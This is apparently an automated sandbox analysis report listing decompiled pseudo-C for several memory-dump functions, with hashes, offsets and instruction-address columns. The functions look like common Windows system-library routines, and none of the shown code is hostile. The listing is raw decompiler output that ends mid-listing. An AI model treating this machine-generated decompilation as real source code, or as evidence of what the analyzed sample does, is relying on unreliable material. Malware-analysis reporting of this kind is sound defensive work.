                                                      0x049d74b5
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                      • Instruction ID: 8cd6f6e134d82a8915e30bd76d94e3e686f3a2f6bf0c83bd9fe0593f8344fd8f
                                                      • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                      • Instruction Fuzzy Hash: FD515A71600606EFDB16CF54C580A96BBB9FF45304F15C1BAE9089F256E371EA46CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04932990, Relevance: .1, Instructions: 133COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 97%
                                                      			E04932990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x49dff00);
				E0495D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x48e1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0494E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x48e1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E049851BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x48e166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E04932AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E04916600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E04932C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E0491EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E04932AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E04932C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E04932ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0495D0D1(_t62);
				goto L28;
			}





















                                                      0x04932990
                                                      0x04932992
                                                      0x04932997
                                                      0x049329a3
                                                      0x049329a6
                                                      0x049329ab
                                                      0x049329ad
                                                      0x049329b2
                                                      0x04975c80
                                                      0x049329b8
                                                      0x049329b8
                                                      0x049329bb
                                                      0x049329c0
                                                      0x049329c5
                                                      0x049329c6
                                                      0x049329c6
                                                      0x049329cb
                                                      0x00000000
                                                      0x00000000
                                                      0x049329cd
                                                      0x049329d0
                                                      0x049329d9
                                                      0x049329db
                                                      0x049329dd
                                                      0x04932a7f
                                                      0x04932a84
                                                      0x04932a87
                                                      0x04932a89
                                                      0x04975ca1
                                                      0x04975ca3
                                                      0x00000000
                                                      0x04932a8f
                                                      0x04932a8f
                                                      0x00000000
                                                      0x04932a8f
                                                      0x00000000
                                                      0x049329e3
                                                      0x049329e3
                                                      0x049329e3
                                                      0x00000000
                                                      0x049329e3
                                                      0x049329dd
                                                      0x00000000
                                                      0x049329db
                                                      0x049329e6
                                                      0x049329e9
                                                      0x049329eb
                                                      0x049329ed
                                                      0x049329f3
                                                      0x049329f5
                                                      0x049329f8
                                                      0x049329fa
                                                      0x04932a97
                                                      0x04932a9a
                                                      0x04932a9d
                                                      0x04932add
                                                      0x00000000
                                                      0x04932a9f
                                                      0x04932aa2
                                                      0x04932aa5
                                                      0x04932aa8
                                                      0x04932aab
                                                      0x04975cab
                                                      0x04975caf
                                                      0x04975cc5
                                                      0x04975cda
                                                      0x04975cdc
                                                      0x04975cdf
                                                      0x04975ce5
                                                      0x00000000
                                                      0x04975ceb
                                                      0x04975ced
                                                      0x04975cee
                                                      0x00000000
                                                      0x04975cee
                                                      0x04975cb1
                                                      0x04975cb4
                                                      0x04975cb9
                                                      0x04975cbb
                                                      0x00000000
                                                      0x04975cbd
                                                      0x04975cbd
                                                      0x00000000
                                                      0x04975cbd
                                                      0x04975cbb
                                                      0x04932ab1
                                                      0x04932ab1
                                                      0x04932ac4
                                                      0x04932ac6
                                                      0x04932ac6
                                                      0x00000000
                                                      0x04932ac6
                                                      0x04932aab
                                                      0x00000000
                                                      0x04932a00
                                                      0x04932a09
                                                      0x04932a0e
                                                      0x04932a21
                                                      0x04932a24
                                                      0x04932a35
                                                      0x04932a3a
                                                      0x04932a3d
                                                      0x04932a42
                                                      0x04932a59
                                                      0x04932a59
                                                      0x04932a5c
                                                      0x04932a5f
                                                      0x04932a5f
                                                      0x049329fa
                                                      0x049329f3
                                                      0x04932a64
                                                      0x04932a64
                                                      0x04932a6b
                                                      0x04932a6b
                                                      0x04932a6d
                                                      0x04932a72
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1f0e16ae3d30ecc8d82be7826b70d1db9d7310fc3a3f1bea6bc8e806886296b9
                                                      • Instruction ID: 2058209570686c83d2e300ff288413abacd5ab8391dec924cd4aec188f18c579
                                                      • Opcode Fuzzy Hash: 1f0e16ae3d30ecc8d82be7826b70d1db9d7310fc3a3f1bea6bc8e806886296b9
                                                      • Instruction Fuzzy Hash: E9516871A00219EFDF25DF95C880ADEBBBABF49314F1580A5E811AB260D335AD52DF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04934D3B, Relevance: .1, Instructions: 131COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 78%
                                                      			E04934D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x49fd360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0494FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x49f7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0494B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L04924620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E0490CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0494B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0494F380(_t67 + 0xc, 0x48e5138, 0x10) == 0) {
								 *0x49f60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E04934F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E04934E70(0x49f86b0, 0x4935690, 0, 0) != 0) {
					_t46 = E0490CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                      0x04934d3b
                                                      0x04934d4d
                                                      0x04934d53
                                                      0x04934d58
                                                      0x04934d65
                                                      0x04934d6c
                                                      0x04934d71
                                                      0x04934d77
                                                      0x04934d7f
                                                      0x04934d8c
                                                      0x04934d8e
                                                      0x04934dad
                                                      0x04934db0
                                                      0x04934db7
                                                      0x04934db8
                                                      0x04934db9
                                                      0x04934dba
                                                      0x04934dbb
                                                      0x04934dc1
                                                      0x04934dc8
                                                      0x04934dcc
                                                      0x04934dd5
                                                      0x04934dde
                                                      0x04934ddf
                                                      0x04934de0
                                                      0x04934de1
                                                      0x04934de6
                                                      0x04934de7
                                                      0x04934de9
                                                      0x04934df3
                                                      0x00000000
                                                      0x00000000
                                                      0x04976c7c
                                                      0x04976c8a
                                                      0x04976c8a
                                                      0x04976c9d
                                                      0x04976ca7
                                                      0x04976cac
                                                      0x04976cb2
                                                      0x04976cb9
                                                      0x00000000
                                                      0x04976cbf
                                                      0x04976cbf
                                                      0x00000000
                                                      0x04976cbf
                                                      0x04976cb9
                                                      0x04934dfb
                                                      0x04976ccf
                                                      0x04976cd3
                                                      0x04934e32
                                                      0x04934e39
                                                      0x04976ce0
                                                      0x04976cf2
                                                      0x04976cf2
                                                      0x04976ce0
                                                      0x04934e3f
                                                      0x04934e41
                                                      0x04934e51
                                                      0x04934e51
                                                      0x04934e03
                                                      0x04934e03
                                                      0x04934e09
                                                      0x04934e0f
                                                      0x04934e57
                                                      0x00000000
                                                      0x00000000
                                                      0x04934e1b
                                                      0x04934e30
                                                      0x04934e5b
                                                      0x04934e5b
                                                      0x00000000
                                                      0x04934e30
                                                      0x04934e11
                                                      0x04934e11
                                                      0x04934e16
                                                      0x00000000
                                                      0x04934e16
                                                      0x04934e01
                                                      0x00000000
                                                      0x04934e01
                                                      0x04934da5
                                                      0x04976c6b
                                                      0x00000000
                                                      0x04934dab
                                                      0x04934dab
                                                      0x00000000
                                                      0x04934dab

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8094e455fbd737c4b8b31007558eb5981b5c7593dab1d1e438c76d8734f23d6e
                                                      • Instruction ID: aa63a2587cc280d4d3198796e23545f07f09702beab809ea5b98b09142b1cbee
                                                      • Opcode Fuzzy Hash: 8094e455fbd737c4b8b31007558eb5981b5c7593dab1d1e438c76d8734f23d6e
                                                      • Instruction Fuzzy Hash: DB410571A40318AFEB31DF14CD84F6ABBAAEB86715F0504B9E9459B280D774FD40CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04934BAD, Relevance: .1, Instructions: 131COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 85%
                                                      			E04934BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x49fd360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E0490CC50(_t86);
					L11:
					return E0494B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x49f8504
				E04922280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0494FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0494B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L04924620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E0490CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x49f8504
								E0491FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E04934F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                                      0x04934bad
                                                      0x04934bbf
                                                      0x04934bc2
                                                      0x04934bc6
                                                      0x04934bcd
                                                      0x04934bd9
                                                      0x049767fe
                                                      0x04976800
                                                      0x04934ccc
                                                      0x04934ccd
                                                      0x04934cb7
                                                      0x04934cc9
                                                      0x04934cc9
                                                      0x04934bdf
                                                      0x04934be5
                                                      0x00000000
                                                      0x00000000
                                                      0x04934beb
                                                      0x04934bef
                                                      0x00000000
                                                      0x00000000
                                                      0x04934bf5
                                                      0x04934bf9
                                                      0x04934c06
                                                      0x04934c0b
                                                      0x04934c17
                                                      0x04934c1c
                                                      0x04934c1f
                                                      0x04934c25
                                                      0x04934c33
                                                      0x04934c3d
                                                      0x04934c40
                                                      0x04934c43
                                                      0x04934c47
                                                      0x04934c4d
                                                      0x04934c53
                                                      0x04934c54
                                                      0x04934c55
                                                      0x04934c56
                                                      0x04934c5b
                                                      0x04934c5c
                                                      0x04934c63
                                                      0x04934c6b
                                                      0x00000000
                                                      0x00000000
                                                      0x04976776
                                                      0x04976784
                                                      0x04976784
                                                      0x0497679f
                                                      0x049767a7
                                                      0x049767af
                                                      0x049767ce
                                                      0x00000000
                                                      0x049767b1
                                                      0x049767b7
                                                      0x049767b8
                                                      0x049767c1
                                                      0x049767d3
                                                      0x049767d9
                                                      0x049767dd
                                                      0x04934c94
                                                      0x04934c94
                                                      0x04934c98
                                                      0x04934c9c
                                                      0x04934ca3
                                                      0x049767f4
                                                      0x049767f4
                                                      0x04934cb5
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04934cb5
                                                      0x04934c79
                                                      0x04934c7e
                                                      0x04934c89
                                                      0x04934c8b
                                                      0x04934c8f
                                                      0x04934c8f
                                                      0x00000000
                                                      0x04934c89
                                                      0x049767c3
                                                      0x00000000
                                                      0x049767c3
                                                      0x049767af
                                                      0x04934c73
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8bfd0a7e0e279e8745810ff8caa44625ff97954b21f3392ffc001435496dcecb
                                                      • Instruction ID: 87549b2026f166c788b6cf67d7bbf39775cb02d7e714af41139a8a3309ab2e19
                                                      • Opcode Fuzzy Hash: 8bfd0a7e0e279e8745810ff8caa44625ff97954b21f3392ffc001435496dcecb
                                                      • Instruction Fuzzy Hash: A641A235A406289BDB21DF68C940FEA77B8EF85B50F0105B5E908AB240DB74FE85CF95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04918A0A, Relevance: .1, Instructions: 120COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 94%
                                                      			E04918A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x49fd360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0494B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0491E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x48e1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E04931DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E04943C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E04918999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                      0x04918a0a
                                                      0x04918a1c
                                                      0x04918a23
                                                      0x04918a2e
                                                      0x04918a30
                                                      0x04918a36
                                                      0x04918a3c
                                                      0x04918a3e
                                                      0x04918a4a
                                                      0x04918a52
                                                      0x04918a9c
                                                      0x04918aae
                                                      0x04918a58
                                                      0x04918a5e
                                                      0x04918a6a
                                                      0x04918a6f
                                                      0x04918a75
                                                      0x04918a7d
                                                      0x04918a85
                                                      0x04918a86
                                                      0x04918a89
                                                      0x04918a93
                                                      0x04918a99
                                                      0x04918a9b
                                                      0x00000000
                                                      0x04918aaf
                                                      0x04918abe
                                                      0x04918ac3
                                                      0x04918acb
                                                      0x04918ad7
                                                      0x04918ae0
                                                      0x04918af1
                                                      0x00000000
                                                      0x04918af1
                                                      0x04918acd
                                                      0x04918ad5
                                                      0x04918afb
                                                      0x04918afd
                                                      0x04918aff
                                                      0x04918b07
                                                      0x04918b22
                                                      0x04918b24
                                                      0x04918b2a
                                                      0x04918b2e
                                                      0x04918b3f
                                                      0x04918b78
                                                      0x04918b41
                                                      0x04918b52
                                                      0x04918b54
                                                      0x04918b5c
                                                      0x04918b74
                                                      0x04918b74
                                                      0x04918b5c
                                                      0x04918b3f
                                                      0x04918b5e
                                                      0x04918b61
                                                      0x04918b64
                                                      0x04918b64
                                                      0x04918b6c
                                                      0x04918b6c
                                                      0x04918b11
                                                      0x04969cd5
                                                      0x04969cd5
                                                      0x04918b17
                                                      0x04918b1a
                                                      0x04918b1a
                                                      0x00000000
                                                      0x04918ad5
                                                      0x04918a89

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b74ba5aac1f624b6790466a53fcf2633435aecd82783d856a16789785d5e1cd3
                                                      • Instruction ID: e171149b49ba6847801d1408fa9f15058cb824e30f758438076703b4e715c9b9
                                                      • Opcode Fuzzy Hash: b74ba5aac1f624b6790466a53fcf2633435aecd82783d856a16789785d5e1cd3
                                                      • Instruction Fuzzy Hash: AE4162B1A4022C9FDB24DF55C888AA9B7F9EF84304F1045FAD81997261E770AE80DF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049CFDE2, Relevance: .1, Instructions: 116COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 76%
                                                      			E049CFDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E049CFD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E049D0A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E04927D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E049C1608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E049D2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E049CC8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E049CDBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E04927D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E049CA80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                                                      0x049cfde7
                                                      0x049cfde8
                                                      0x049cfdec
                                                      0x049cfdee
                                                      0x049cfdf5
                                                      0x049cfdf7
                                                      0x049cfdfc
                                                      0x049cfe19
                                                      0x049cfe22
                                                      0x049cfe26
                                                      0x049cfec6
                                                      0x049cfecd
                                                      0x049cfed5
                                                      0x049cfee7
                                                      0x049cfed7
                                                      0x049cfee0
                                                      0x049cfee0
                                                      0x049cfeef
                                                      0x049cff00
                                                      0x049cff02
                                                      0x049cff07
                                                      0x049cff07
                                                      0x00000000
                                                      0x049cfeef
                                                      0x049cfe33
                                                      0x049cfe55
                                                      0x049cfe59
                                                      0x049cfe5b
                                                      0x049cfe5e
                                                      0x049cfe69
                                                      0x049cfe6d
                                                      0x049cfe6d
                                                      0x049cfe69
                                                      0x049cfe35
                                                      0x049cfe41
                                                      0x049cfe41
                                                      0x049cfe79
                                                      0x049cfe8b
                                                      0x049cfe7b
                                                      0x049cfe84
                                                      0x049cfe84
                                                      0x049cfe93
                                                      0x00000000
                                                      0x049cfea8
